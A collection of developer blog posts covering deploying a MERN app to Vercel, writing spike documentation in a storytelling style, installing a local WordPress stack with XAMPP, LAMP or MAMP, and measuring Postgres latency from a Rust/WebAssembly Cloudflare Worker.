  const [incomingRequests, setIncomingRequests] = useState([]);
  const [teamMembers, setTeamMembers] = useState([]);
  const [showVolunteers, setShowVolunteers] = useState(false);
  const [loading, setLoading] = useState(true);
  const [error, setError] = useState(null);

  useEffect(() => {
    fetchIncomingRequests();
    fetchTeamMembers();
  }, []);

  // Fetch functions and other logic here...

  return (
    <div className="user-management-main-container">
      {/* Component JSX here... */}
    </div>
  );
};

export default UserManagement;
```

> This component manages the display of different user tables and handles data fetching.

**Implementing API Calls to the Backend**

To interact with our backend, I've created an `api.js` file in the services folder. Here's a snippet of how it's structured:

```
const BASE_URL = 'http://localhost:9000';

const handleResponse = async (response) => {
  if (!response.ok) {
    const error = await response.text();
    throw new Error(error);
  }
  return response.json();
};

const api = {
  team: {
    getMembers: (status) =>
      fetch(`${BASE_URL}/get-team-members?status=${status}`)
        .then(handleResponse),
    acceptRequest: (userId) =>
      fetch(`${BASE_URL}/accept-request/${userId}`, {
        method: 'POST',
      }).then(handleResponse),
    // Other API methods...
  },
  // Other API categories...
};

export default api;
```

> This centralized API structure allows for easy management of all backend requests.

In the components, we use these API calls like this:

```
const fetchIncomingRequests = async () => {
  try {
    const data = await api.team.getMembers('pending');
    setIncomingRequests(data);
  } catch (error) {
    setError('Error fetching incoming requests');
  } finally {
    setLoading(false);
  }
};
```

This approach keeps our components clean and our API calls organized.

**Connecting Frontend and Backend**

In this section, we'll focus on configuring CORS (Cross-Origin Resource Sharing) and testing local communication between our React frontend and Express backend.

**Configuring CORS**

CORS is a crucial security feature that needs to be properly configured to allow our frontend to communicate with the backend. In the `index.js` file, we've already set up CORS; to restrict it to the React dev server (which runs on port 3000), pass an origin instead of calling `cors()` with no options:

```
const cors = require('cors');

app.use(cors({
  origin: 'http://localhost:3000' // the React dev server; change to your Vercel frontend URL later
}));
```

**Testing Local Communication**

To test the communication between your frontend and backend locally:

Start your backend server:

```
npm start build
```

You should see a message: `Server is running on port 9000`

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fm6z91sfndh2f6hoccvd.png)

In your frontend's api.js file, ensure you're using the correct local URL.
For this article: `const BASE_URL = 'http://localhost:9000';`

Start your React development server: `npm start`

Test an API call, for example, fetching team members:

```
const fetchTeamMembers = async () => {
  try {
    const response = await fetch(`${BASE_URL}/get-team-members?status=accepted`);
    const data = await response.json();
    console.log('Team members:', data);
  } catch (error) {
    console.error('Error fetching team members:', error);
  }
};
```

Check your browser's console and network tab to ensure the request is successful and data is being received.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bvqffahg1xsw6x7lsoge.png)

If you encounter any CORS errors, double-check your CORS configuration in the backend.

**Preparing for Deployment**

In this section, we'll focus on creating a Vercel configuration file and pushing your code to GitHub repositories, which are crucial steps for deploying your application on Vercel.

**Creating a Vercel Configuration File**

Vercel uses a configuration file named `vercel.json` to specify how to build and deploy your application. Here's the configuration file we'll use:

```
{
    "version": 2,
    "builds": [
        {
            "src": "*.js",
            "use": "@vercel/node"
        }
    ],
    "routes": [
        {
            "src": "/(.*)",
            "dest": "/",
            "methods": ["GET","POST", "PUT", "DELETE", "PATCH", "OPTIONS"],
            "headers": {
                "Access-Control-Allow-Origin": "*",
                "Access-Control-Allow-Credentials": "true",
                "Access-Control-Allow-Headers": "X-CSRF-Token, X-Requested-With, Accept, Accept-Version, Content-Length, Content-MD5, Content-Type, Date, X-Api-Version"
            }
        }
    ]
}
```

This configuration does the following:

- Specifies that we're using version 2 of Vercel's configuration.
- Sets up builds for all JavaScript files using the Node.js runtime.
- Configures routes to handle all HTTP methods and sets up CORS headers.

> Create this file in the root of your backend project and name it `vercel.json`.

**Pushing Code to GitHub Repositories**

Before deploying, you need to push your code to GitHub. For this project:

1. Create two repositories on GitHub: one for your frontend and one for your backend.
2. In your backend directory, initialize a Git repository if you haven't already:

```
git init
```

3. Add your files and commit:

```
git add .
git commit -m "Initial commit for backend"
```

4. Add your GitHub repository as a remote and push:

```
git remote add origin https://github.com/your-username/your-backend-repo.git
git branch -M main
git push -u origin main
```

5. Repeat steps 2-4 for your frontend directory, using the frontend GitHub repository URL.

**Installing and Using Vercel CLI**

To deploy your application using Vercel, you'll need to install and use the Vercel CLI:

Install Vercel CLI globally:

```
npm install -g vercel
```

Verify the installation:

```
vercel --version
```

Log in to your Vercel account:

```
vercel login
```

![Vercel Login CLI](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cwg7qu0kxsxqdo4c860t.png)

![Vercel Login Success](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/83kgnj5gek9jxvhxfz4y.png)

**Deploying to Vercel**

Before starting, ensure you're logged into your Vercel account.

**Deploying the React Frontend**

In the Vercel dashboard, click on `"Add New"` and select `"Project"` from the dropdown.

![Vercel Dashboard](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rtw2i777oc1p6ot4dmbn.png)

Choose `"Import Git Repository"` and select your frontend repository.
![Selecting Repo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/c2iv0m9efeltiyo188iu.png) Configure the project: - Enter a project name - For Framework Preset, select `"Create React App"` - Set Root Directory to "./" (if your package.json is in the root) - Leave Build and Output Settings as default - Leave Environment Variables as default ![Configurations](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sdnukm58mn9aqjfcunyb.png) Click `"Deploy"` Vercel will now build and deploy your React frontend. Once complete, you'll receive a URL for your deployed frontend. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0cqbopsbf69n7pcat8j9.png) **Deploying the Node.js Backend** Again, click on `"Add New"` and select `"Project"`. Choose `"Import Git Repository"` and select your backend repository. Configure the project: - Enter a project name - For Framework Preset, select "Other" - Set Root Directory to "./" (if your package.json is in the root) - Leave Build and Output Settings as default - Configuring `"Environment Variables"`: Add your environment variables exactly as they appear in your local .env file. For example: - Key: `MONGODB_URI` - Value: `mongodb+srv://your_username:your_password@your_cluster.mongodb.net/your_database?retryWrites=true&w=majority` Add any other necessary environment variables (e.g., PORT, JWT_SECRET, etc.) Click `"Deploy"` ![Environment Variables setup](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q1ifr2omrttkjh0fje1y.png) Vercel will begin building your backend code. However, the build may take some time due to environment variables. ![Success for backend deploy](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/h9ae6xbfp46647m3eq7t.png) ![Both front and backend deployments](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dkxgln0tyug39j6isr09.png) _You've successfully deployed frontend React App and Backend Node js Server to Vercel!!!_ **Important Notes:** > Make sure your backend code is using environment variables correctly, e.g., `process.env.MONGODB_URI`. > In your frontend code, update the API base URL to use the deployed backend URL. > If you make changes to your code, push them to GitHub. Vercel will automatically redeploy your application. > Always keep your environment variables secret and never commit them to your repository. **Updating API Endpoints in the Frontend** After successfully deploying both your frontend and backend, you need to update the API endpoints in your frontend code to point to the deployed backend URL. In your frontend code, locate your API configuration file (e.g.,` src/services/api.js`). Update the BASE_URL to your deployed backend URL: ``` const BASE_URL = 'http://localhost:9000'; // Local development const BASE_URL = 'https://dmfc-server.vercel.app'; // Deployed backend ``` Redeploy your frontend application to Vercel with these changes by pushing to Github. **Final Testing and Verification** Now it's time to thoroughly test your deployed application: Open your deployed frontend URL in a web browser. Test all functionalities of your application, ensuring they work as expected with the live backend. Test your application on different devices and browsers to ensure compatibility. Monitor your Vercel logs and MongoDB Atlas dashboard for any errors or unexpected behavior. 
![Frontend](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e6w5m66jcsl7kxuj88ax.png)

![Backend](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ls9h2xw0egtoucrbcg6k.png)

**Conclusion**

Congratulations! You've successfully deployed your MERN stack application to Vercel. Here's a summary of what we've accomplished:

- Set up a React frontend and Node.js/Express backend with MongoDB integration.
- Prepared our application for deployment by creating necessary configuration files.
- Deployed both frontend and backend to Vercel.
- Configured environment variables to ensure secure and proper functionality.
- Updated API endpoints and performed final testing.

> Your application is now live and accessible to users worldwide.
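One refinement worth considering (my own suggestion, not part of the original tutorial): instead of hardcoding `BASE_URL` and editing it for each environment, read it from an environment variable. Create React App inlines any variable prefixed with `REACT_APP_` at build time, so a sketch like this keeps local development and the Vercel deployment working from the same code:

```
// src/services/api.js -- hypothetical refinement
// REACT_APP_API_URL is a variable name you would choose yourself.
const BASE_URL = process.env.REACT_APP_API_URL || 'http://localhost:9000';
```

Set `REACT_APP_API_URL` to your deployed backend URL in the frontend project's environment variables on Vercel; the fallback keeps `npm start` pointing at your local server.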
matrix24483
1,919,986
Write spike stories like fairy tales
For more content like this subscribe to the ShiftMag newsletter. _ “Hello, my name is Inigo...
0
2024-07-17T13:05:02
https://shiftmag.dev/how-to-write-spike-3708/
softwareengineering, documentation, spike, techicalwriting
---
title: Write spike stories like fairy tales
published: true
date: 2024-07-11 11:28:23 UTC
tags: SoftwareEngineering,Documentation,spike,techicalwriting
canonical_url: https://shiftmag.dev/how-to-write-spike-3708/
---

![](https://shiftmag.dev/wp-content/uploads/2024/07/how-to-write-spikes.png?x43006)

_For more content like this **[subscribe to the ShiftMag newsletter](https://shiftmag.dev/newsletter/)**._

_ **“Hello, my name is Inigo Montoya. You killed my father. Prepare to die.”** _

Look at these three short, beautiful sentences and ask yourself whether there is something left to be desired. Yeah, I thought as much. They’re perfect because they strike the balance between being short enough not to bore you and driving their point across, just like Inigo drove his rapier through Rugen’s torso.

This is exactly how your spikes should be. I mean, you shouldn’t drive your spike through anyone’s torso, but you get the gist.

Coincidentally (or not), this quote is from the cult movie [The Princess Bride](https://www.imdb.com/title/tt0093779/), which could be considered a fairy tale. But what does a princess have to do with such a technical term as a spike?

…what’s that? _“What’s technical about **a spike**?”_ I hear you asking. My bad, I should’ve explained that I don’t mean sharpened sticks when I say spikes. So what **do** I mean?

## What is a spike?

We’re, of course, talking about spikes in software development. Let’s skip the [textbook definition of _eXtreme Programming mumbo jumbo_](https://en.wikipedia.org/wiki/Spike_(software_development)) and let me explain it in the simplest of terms: **it’s a process of discovery.**

You have a problem you need to solve, but there are just way too many questions and unknowns. Sure, you could dive in head-first and attempt to resolve all the issues on the spot, but we all know how that ends. Been there, done that.

Spikes are meant to allocate some time for **research and documentation of the problem you’re facing.** The output is usually an article or technical documentation to which you and your team can later refer _if_ (sorry… I meant _when_) you decide to tackle the problem.

The term itself makes sense in the environment of agile development, but let’s forget all of that and simply call the process of discovery and its documentation a spike.

Before we go any further, I should probably warn you that I won’t actually tell you what methodologies to use to complete a spike – how to do the research, what to include, etc. This is a topic for another article. **We’re going to discuss how to make your spikes more memorable, easier to read, and simply better**.

![](https://shiftmag.dev/wp-content/uploads/2024/07/extreme-programming--1024x538.png?x43006)

_In this picture: A man is trying to make his spike more memorable._

Cool, now that we have that out of the way, I can answer another question you probably have. **_What the hell do you mean by “spikes are fairy tales”?_**

You know exactly what I mean. Don’t tell me you’ve never trailed off to Wonderland when reading documentation. We all did it. Studies show that over **90% of developers fall asleep when reading technical documentation**. Source: trust me bro.

That’s what spikes and fairy tales have in common – they make us fall asleep while taking us on a journey through made-up scenarios that we know can never be reality.

Okay, okay. I think I’ve been facetious enough. Let’s be serious for a second – it’s a real issue, and I’m sure most, if not all, of us have experienced it from both sides.
You spend time and energy writing something only to be asked over and over about details that are actually in there. Or you read through docs, and you just go, “Huh?” after every third sentence. It’s perfectly normal. We all get distracted when we read through something boring or when it’s so hard to read our eyes water up. I know you’re just itching to write a spike right now, but it’s very important, and I can’t stress this enough, so I will use big letters. It’s **VERY IMPORTANT** to understand the scope and the purpose of your documentation. It’s amazing when you write a spike that’s easy to read, memorable and engaging, but it’s a complete waste of time when you spend two days perfecting it only for no one to ever read it. **Ask yourself these questions:** - Is this topic important enough? - Will I or someone else refer to it later? - Will it teach junior colleagues something new? - Is the process as important as the outcome? If you’ve answered nay to any of these questions, then don’t bother. It’s better to just do hardcore robotic documentation, which will at least be easy to navigate through. I mean it. Just do “this is the problem, this is the solution, have a nice day”. Now that you’re able to identify what kind of documentation this article focuses on, we can go ahead and learn **how to be able to write spikes in a more human-friendly way.** But in order to do that, we’ll first have to understand what a spike is actually trying to achieve. ## What should a spike achieve? I’ve already said it a couple of times, but let’s repeat it again. The goal of the spike is to come up with one or multiple solutions to a problem, clear up all unknowns, and **document the process**. The last part is what’s important for us. Many of us fall into the trap of simply writing out the outcome in a very factual and technical manner. This is great if you want to refer to it quickly, but it does nothing when others try to understand the thought process you went through. If others don’t understand your decisions, you will face questions like _“Why did you choose this instead of that?”_, _“What if this happens? Have you thought of that?” or “I don’t understand how this is going to solve our issue; why are you like this? Why can’t you be normal like the others?”._ Okay, maybe not the last one, but you know what I mean. I don’t want to bore you too much but it’s important to understand how the reader of our spike should **feel** once they’re done reading it. Emphasis on **feel**. They should **feel** that they have the same or comparable understanding of the problem you have, they should **feel** that they know why you chose this solution, and they should **feel** awake and not asleep. The spike needs to introduce the problem, describe the research process, present the solutions, and evaluate them. It should answer all standing questions and it should be easy to refer to. On to some actual advice! ## How do we do it? _DISCLAIMER: I have no formal training in this. It’s just a bunch of stuff I thought made sense._ I wanted to refer to Inigo Montoya again, but it’s time to stop here. I’ve used his quote to hook you in but now I’m pretty much bending over backwards to make it fit our narrative. So let’s just retreat to a more simple structure we can follow: 1. The world building 2. The journey 3. The grand finale ### The world building First, you should introduce your readers to the problem. This is the world-building part—you introduce the characters, the world, and the basic premise of the story. 
It does not need to be too detailed; just use a few brief sentences and leverage references to tickets, diagrams, code, **or threads on Slack**. The key is to **keep it simple without omitting any important information**. Your introduction should also outline the plot. In other words, you should explain why we need to solve this problem. Again, just a few sentences, nothing too fancy. This is the easy part. What you want to achieve is to **have your readers understand the problem and why we’re solving it** after finishing your introduction. ### The journey Now that everyone knows what’s up, it’s time to tell the story itself. You went on an adventure and you want to share this adventure with others. You want to make sure that people will see what you’ve seen, feel what you’ve felt and be able to understand your motives. Remember, you’ve already been on this journey so you know exactly why it happened like it did. When you read your story, you know why you set fire to the forest, even though you didn’t explicitly say it – _everyone knows that there are monsters in that forest_! Well, that’s where you’re wrong. You have to realize that your readers did not have the same experience you did. **Do not make the mistake of assuming that readers know what you’re talking about** because chances are they don’t. Allow me to use an example from my own spike I wrote some time ago: _Let’s start by fetching n entries. We don’t need the values, we need the keys, so we could simply use the [`KEYS`](https://redis.io/commands/keys/) command, right? **WRONG!** I can’t count how many times I’ve seen “do not use KEYS in production!” plastered over the internet. Instead, the official docs point us towards using the [`SCAN`](https://redis.io/commands/scan/) command. It allows us to set the number of keys it will fetch, which we can set to n._ I could have just written, “We will use SCAN to get the entries”, but that would lead to questions. _Why did you use SCAN and not KEYS?_ From the style of this article and the short snippet of my spike, you can probably tell that I like to embellish stuff _a bit_. I would like to stress that **you don’t have to do this**. In fact, **you should not overdo it and rather keep it too short than too long**. It’s just my personal style, and wasting time on making something three times longer than it has to be is fun for me. Writing it like so: _Let’s start by fetching n entries. We will use the SCAN command, because official docs state that using KEYS is unsafe._ would have been perfectly fine. It’s shorter and much more to the point, which is absolutely a great thing. Remember, **it should be short enough to be digestible in one sitting (in most cases)**. The reason I wrote it like that and why I keep stuffing this fairy tale nonsense all over the place is to **break the monotony of “lecturing.”** People can take only so many sentences of straight-up facts before their mind starts to wander off. By being funny (or at least trying to), you shock the reader a bit. Maybe you provoke a chuckle; maybe the reader cringes a bit. Both are fine – they’ve achieved their purpose, and the attention span has reset. Now, the reader is ready to consume more facts. Use jokes, pictures, whatever comes to mind. It doesn’t need to be funny, just not too serious. There is a delicate balance between just spitting facts and making a clown out of yourself, and quite honestly, it’s very hard to get right. But this is what it’s about – **it’s about making the read interesting**. 
At the same time, **make sure that your breaks don’t disrupt the flow of thought too much**. It goes without saying that the process you’re describing should make logical sense. Start by building a knowledge foundation, exploring options, guiding through scenarios, and finally arriving at a decision. A good tip is to simply follow the process you went through because it’s natural. When you read a story, it doesn’t paint a picture of a bustling city, only to go back to the dangers of the road leading to it.

![](https://shiftmag.dev/wp-content/uploads/2024/07/python-monty--1024x538.png?x43006)

_In this picture: A band of brave knights traveling to a bustling city._

Additionally, notice the style in which the few sentences from my spike were written. _“We don’t need the values…”_ or _“the official docs point us towards…”_. **We want our writing to be engaging, to make the reader feel like they’re also a part of the process**. Writing it out like, _“The values are not necessary. Keys will suffice. The official docs state that this and that should be used. Beep boop.”_ is incredibly monotonous and straight-up boring.

Another important thing to practice is assuming your reader will only have the most basic knowledge of the domain. Think of it as explaining to a kindergartner. You may think this would be an insult to your more experienced coworkers, but personally, I view it in the complete opposite way. Your goal is to explain something using the least complicated sentences so that your readers understand what is going on. Don’t shy away from using colors and animals instead of being overly technical.

But at the same time, don’t overdo it. **Some parts will require straight-up technical terms or diagrams**, and that is okay. **Don’t try to substitute those with abstract concepts** because that will result in no one being any wiser. What you can do, however, is ease your readers in by first explaining the thing simply and then fitting the more technical details into the framework you’ve built.

Last but not least – **formatting is your friend**. It’s much easier to read through text that is broken down into logical sections than through an unrelenting wall of text OF DOOM. You know how letters just kind of start to blend together, and you keep skipping lines? Yeah. Another thing you can use to a great effect is to highlight important parts of your text by using **bold** or colors. Just look at this article, and you’ll get the idea. Hopefully not the wrong one.

### The grand finale

Finally, we get to the climax. This is what everyone is here for. The knight in shining armor had finally slain the dragon and rescued the princess. Everyone is happy and there’s fireworks everywhere.

This is what your solution and results should look like. **Don’t be afraid to use colorful pictures and striking formatting**. Just take a look; which one do you think looks better?

This:

_“We can put a smart balancer in front of our resolvers. That way the 3rd party service will have to know just one endpoint. The balancer will forward the request to our resolvers, which will load the data from our stretched database while caching the results. Because the result is not necessary for processing, we can notify the consumer asynchronously.” (yawn)_

or this?
![](https://shiftmag.dev/wp-content/uploads/2024/07/example-1024x373.png?x43006) _In this picture, A man is trying to make up a bogus diagram and failing miserably._ Which one was easier and more fun to understand? By the way, it’s [excalidraw.com](https://excalidraw.com/). However, don’t make the mistake of thinking you can _fairytale-ize_ this part too much. This is where the actual next steps should be and it’s important to remember that this is the part that people will most often come back to refer to. **You can’t avoid technical details here, so don’t try to. ** But that does not mean you can’t make it as digestible as possible. It’s nice to have it funny and readable and everything, but **when people come back to refer to your solutions, they should be easy to find and understand**. Finally, remember to evaluate the solutions you’ve proposed. Personally, I would say that the best approach here is to keep it stupid and simple and do good ole pros and cons. Bonus points if you put it inside a fancy table and make the pros green and cons red. **Let’s sum it up** Screenshot this, put it next to your bed, and read it each time you go to sleep. - Keep it simple, but don’t leave out important details. - Keep it short, and don’t overdo it with storytelling. It should be digestible in one sitting. - Make sure your readers understand the issue as you do. Guide them through the process. - Leverage external references. - Write in an engaging way – make your readers feel like they’re playing an important part. - Assume that your readers have only basic knowledge of the domain. - Break the monotony by cracking jokes or using media. - Formatting is your friend – use it to drive your point across; important parts should stick out. - When some part requires technical details, put them in. - Spikes should be easy to navigate through, just stick to Introduction – Process explanation – Solution. ### WTF did I just read? That’s a great question. Quite frankly I don’t know wtf I just wrote. But if you got to this part it means that I probably did something right. The point I was trying to make is that **technical documentation does not need to be oppressively professional, dull, and boring**. We can’t avoid it completely, but that does not mean we can’t make the reading experience better. Many people will make the counterpoint of this being a waste of time and energy, and I can’t say that they’re completely wrong. It’s not our job to write funny or beautiful stories, our job is to make machines do our bidding (while we still can anyways). But it’s also our job to do it in an efficient way. Put on your corporate face and ask yourself this – what wastes more money – a developer spending three hours instead of one writing documentation, or six developers spending an hour each instead of 15 minutes trying to understand it? If it’s going to be easier explaining your docs, why bother writing them at all? When you decide to spend the energy to write it, you might as well write it well. Or, what the hell, you can just paste your documents into an AI chat bot and prompt it to improve them. What do I know? Now, then, off to sharpen another spike! The post [Write spike stories like fairy tales](https://shiftmag.dev/how-to-write-spike-3708/) appeared first on [ShiftMag](https://shiftmag.dev).
shiftmag
1,920,095
Getting Started with WordPress: A Step-by-Step Guide to Local Installation
Introduction: 🚀 Welcome to Series 1: Building a Simple WordPress Site! 🚀 In this series, I'll guide...
28,055
2024-07-13T13:49:47
https://dev.to/anchal_makhijani/getting-started-with-wordpress-a-step-by-step-guide-to-local-installation-3da2
webdev, learning, opensource
**Introduction:**

🚀 Welcome to Series 1: Building a Simple WordPress Site! 🚀

In this series, I'll guide you through the essential steps to create and manage your very own WordPress website. Whether you're a WordPress newbie or looking to refine your skills, this series will equip you with the knowledge to build a functional and customizable site. 🌐

**Prerequisites:**

Before starting this series, make sure you have:

- Basic familiarity with web development concepts (HTML, CSS). 💻
- Access to a computer with an internet connection. 🌐
- A local development environment set up (XAMPP, LAMP, etc.) for installing WordPress. 🛠️

No prior experience with WordPress is required, but having a basic understanding of web technologies will enhance your learning experience. Let's dive into creating your WordPress site step-by-step! 🎉

**Part 1: Getting Started with WordPress**

**Step-by-Step Guide**

**Step 1: Introduction and Setup**

_Title: Introduction to WordPress_

_Overview of WordPress as a CMS:_

WordPress stands as the most popular Content Management System (CMS) globally, facilitating the creation and management of websites. Its versatility supports a wide range of applications, from blogs to complex e-commerce platforms. 🌍

_Installing WordPress locally using XAMPP, MAMP or LAMP:_

**_XAMPP (Windows, macOS, Linux)_**

- XAMPP: Visit [Apache Friends](https://www.apachefriends.org/download.html) and download XAMPP for your operating system.
- Run the installer and follow the prompts to install XAMPP.
- Open the XAMPP Control Panel and click "Start" next to Apache and MySQL.

**_LAMP (Linux)_**

Open your terminal for installation:

- Update Package Repository: `sudo apt update`
- Install Apache Web Server: `sudo apt install apache2`
- Verify Apache Installation: `sudo systemctl status apache2`
- Adjust Firewall Settings: `sudo ufw allow 'Apache'`
- Install MySQL/MariaDB Database Server: `sudo apt install mysql-server`
- Secure MySQL/MariaDB Installation: `sudo mysql_secure_installation`
- Install PHP: `sudo apt install php libapache2-mod-php php-mysql`
- Verify PHP Installation: `sudo nano /var/www/html/info.php`, add the PHP code `<?php phpinfo(); ?>`, then save and close the file. Access http://localhost/info.php in your browser to see PHP information.
- Testing: `echo "<?php phpinfo(); ?>" | sudo tee /var/www/html/test.php`, then access http://localhost/test.php to verify PHP functionality.

**_MAMP (macOS)_**

- Visit [MAMP](https://www.mamp.info/en/downloads/) and download MAMP for macOS.
- Open the downloaded .dmg file and drag the MAMP folder to your Applications folder.
- Open Applications, then MAMP, and double-click MAMP.app.
- Click "Start Servers" to start Apache and MySQL.

**_Conclusion_**

🎉 Congratulations on setting up your local development environment with XAMPP, LAMP, or MAMP! This crucial step allows you to develop and test your WordPress site safely. 🎉

In this episode, we have:

Introduced WordPress as a CMS. 📝
Detailed the setup for XAMPP, LAMP, and MAMP. 🛠️

Next, we'll cover installing WordPress and exploring its features. Stay tuned for more on building your WordPress site from scratch. Happy developing! 🚀💻🌟
anchal_makhijani
1,920,167
Latency at the Edge with Rust/WebAssembly and Postgres: Part 1
We have been working on enabling Exograph on WebAssembly. Since we have implemented Exograph using...
0
2024-07-12T01:35:59
https://exograph.dev/blog/wasm-pg-explorations-1
postgres, webassembly, rust
--- title: Latency at the Edge with Rust/WebAssembly and Postgres: Part 1 published: true date: 2024-06-05 00:00:00 UTC tags: postgres,wasm,Rust,WebAssembly canonical_url: https://exograph.dev/blog/wasm-pg-explorations-1 --- We have been working on enabling [Exograph](https://exograph.dev) on [WebAssembly](https://webassembly.org/). Since we have implemented Exograph using [Rust](https://www.rust-lang.org/), it was natural to target WebAssembly. You can soon build secure, flexible, and efficient [GraphQL](https://graphql.org/) backends using Exograph and run them at the edge. During our journey towards WebAssembly support, we learned a few things to improve the latency of Rust-based programs targeting WebAssembly in [Cloudflare Workers](https://developers.cloudflare.com/workers/) connecting to [Postgres](https://www.postgresql.org/). This two-part series shares those learnings. In this first post, we will set up a simple Cloudflare Worker connecting to a Postgres database and get baseline latency measurements. In the next post, we will explore various ways to improve it. Even though we experimented in the context of Exograph, the learnings should apply to anyone using WebAssembly in Cloudflare Workers (or other platforms that support WebAssembly) to connect to Postgres. > Second Part > Read [Part 2](https://exograph.dev/blog/wasm-pg-explorations-2) that improves latency by a factor of 6! ## Rust Cloudflare Workers Cloudflare Workers is a serverless platform that allows you to run code at the edge. The [V8 engine](https://v8.dev/) forms the underpinning of the Cloudflare Worker platform. Since V8 supports JavaScript, it is the primary language for writing Cloudflare Workers. However, JavaScript running in V8 can load WebAssembly modules. Therefore, you can write some parts of a worker in other languages, such as Rust, compile it to WebAssembly, and load that from JavaScript. Cloudflare Worker's Rust tooling enables writing workers entirely in Rust. Behind the scenes, the tooling compiles the Rust code to WebAssembly and loads it in a JavaScript host. The Rust code you write must be able to compile to `wasm32-unknown-unknown` target. Consequently, it must follow the restrictions of WebAssembly. For example, it cannot access the filesystem or network directly. Instead, it must rely on the host-provided capabilities. Cloudflare provides such capabilities through the [worker-rs](https://github.com/cloudflare/workers-rs) crate. This crate, in turn, uses [wasm-bindgen](https://github.com/rustwasm/wasm-bindgen) to export a few JavaScript functions to the Rust code. For example, it allows opening network sockets. We will use this capability later to integrate Postgres. Here is a minimal Cloudflare Worker in Rust: ```rust use worker::*; #[event(fetch)] async fn main(_req: Request, _env: Env, _ctx: Context) -> Result<Response> { Ok(Response::ok("Hello, Cloudflare!")?) } ``` To deploy, you can use the `npx wrangler deploy` command, which compiles the Rust code to WebAssembly, generates the necessary JavaScript code, and deploys it to the Cloudflare network. Before moving on, let's measure the latency of this worker. We will use [Ohayou](https://github.com/hatoo/oha), an HTTP load generator written in Rust. We measure latency using a single concurrent client (`-c 1`) and one hundred requests (`-n 100`). ```sh oha -c 1 -n 100 <worker-url> ... Slowest: 0.2806 secs Fastest: 0.0127 secs Average: 0.0214 secs ... ``` It takes an average of 21ms to respond to a request. 
This is a good baseline to compare when we add Postgres to the mix.

## Focusing on latency

We will focus on measuring the lower bound for latency of the roundtrip for a request to the worker that queries a Postgres database before responding. Here is our setup:

- Use a [Neon](https://neon.tech) Postgres database with the following table and no rows to focus on network latency (and not database processing time).

```sql
CREATE TABLE todos (
    id SERIAL PRIMARY KEY,
    title TEXT NOT NULL,
    completed BOOLEAN NOT NULL
);
```

- Implement a Cloudflare Worker that responds to `GET` by fetching all completed todos from the table and returning them as a JSON response (of course, since there is no data, the response will be an empty array, but the use of a predicate will allow us to explore some practical considerations where the queries will have a few parameters).
- Place the worker, database, and client in the same region. While we can't control the worker placement, Cloudflare will place the worker close to either the client or the database (which we've put in the same region).

All right, let's get started!

## Connecting to Postgres

Let's implement a simple worker that fetches all completed todos from the Neon Postgres database. We will use the [tokio-postgres](https://crates.io/crates/tokio-postgres) crate to connect to the database.

```rust
#[event(fetch)]
async fn main(_req: Request, env: Env, _ctx: Context) -> Result<Response> {
    let config =
        tokio_postgres::config::Config::from_str(&env.secret("DATABASE_URL")?.to_string())
            .map_err(|e| worker::Error::RustError(format!("Failed to parse configuration: {:?}", e)))?;

    let host = match &config.get_hosts()[0] {
        Host::Tcp(host) => host,
        _ => {
            return Err(worker::Error::RustError("Could not parse host".to_string()));
        }
    };
    let port = config.get_ports()[0];

    let socket = Socket::builder()
        .secure_transport(SecureTransport::StartTls)
        .connect(host, port)?;

    let (client, connection) = config
        .connect_raw(socket, PassthroughTls)
        .await
        .map_err(|e| worker::Error::RustError(format!("Failed to connect: {:?}", e)))?;

    wasm_bindgen_futures::spawn_local(async move {
        if let Err(error) = connection.await {
            console_log!("connection error: {:?}", error);
        }
    });

    let rows: Vec<tokio_postgres::Row> = client
        .query(
            "SELECT id, title, completed FROM todos WHERE completed = $1",
            &[&true],
        )
        .await
        .map_err(|e| worker::Error::RustError(format!("Failed to query: {:?}", e)))?;

    Ok(Response::ok(format!("{:?}", rows))?)
}
```

There are several notable things (especially if you are new to WebAssembly):

- In a non-WebAssembly platform, you would get the client and connection directly using the database URL, which opens a socket to the database. For example, you would have done something like this:

```rust
let (client, connection) = config.connect(tls).await?;
```

However, that won't work in a WebAssembly environment since there is no way to connect to a server (or, for that matter, access any other resource such as the filesystem). This is the core characteristic of WebAssembly: it is a sandboxed environment that cannot access resources unless explicitly provided (through functions exported to the WebAssembly module). Therefore, we use `Socket::builder().connect()` to create a socket (which, in turn, uses the [TCP Socket API provided by the Cloudflare runtime](https://developers.cloudflare.com/workers/runtime-apis/tcp-sockets/)). Then, we use `config.connect_raw()` to lay the Postgres protocol over that socket.
- We would have marked the `main` function with, for example, `#[tokio::main]` to bring in an async executor. However, here too, WebAssembly is different. Instead, we must rely on the host to provide the async runtime. In our case, the Cloudflare Worker provides a runtime (which uses JavaScript's event loop).
- In a typical Rust program, we would have used `tokio::spawn` to spawn a task. However, in WebAssembly, we use `wasm_bindgen_futures::spawn_local`, which runs in the context of JavaScript's event loop.

We will deploy it using `npx wrangler deploy`. You will need to create a database and add the `DATABASE_URL` secret to the worker. You can test the worker using `curl`:

```sh
curl https://<worker-url>
```

And measure the latency:

```sh
oha -c 1 -n 100 <worker-url>
...
Slowest: 0.8975 secs
Fastest: 0.2795 secs
Average: 0.3441 secs
```

So, our worker takes an average of 345ms to respond to a request. Depending on the use case, this can be between okay-ish and unacceptable. But why is it so slow? We are dealing with two issues here:

1. **Establishing connection to the database**: The worker creates a new connection for each request. Given that it is a secure connection, it takes 7+ round trips. Not surprisingly, latency is high.
2. **Executing the query**: The `query` method in our code causes the Rust Postgres driver to make two round trips: to prepare the statement and to bind/execute the query. It also sends a one-way message to close the prepared statement.

How can we improve? We will address that in the next post by exploring connection pooling and possible changes to the driver. Stay tuned!
ramnivas
1,920,168
Latency at the edge with Rust/WebAssembly and Postgres: Part 2
In the previous post, we implemented a simple Cloudflare Worker in Rust/WebAssembly connecting to a...
0
2024-07-11T23:12:32
https://exograph.dev/blog/wasm-pg-explorations-2
postgres, webassembly, cloudflare, worker
---
title: Latency at the edge with Rust/WebAssembly and Postgres: Part 2
published: true
date: 2024-06-06 00:00:00 UTC
tags: postgres,WebAssembly,Cloudflare, Worker
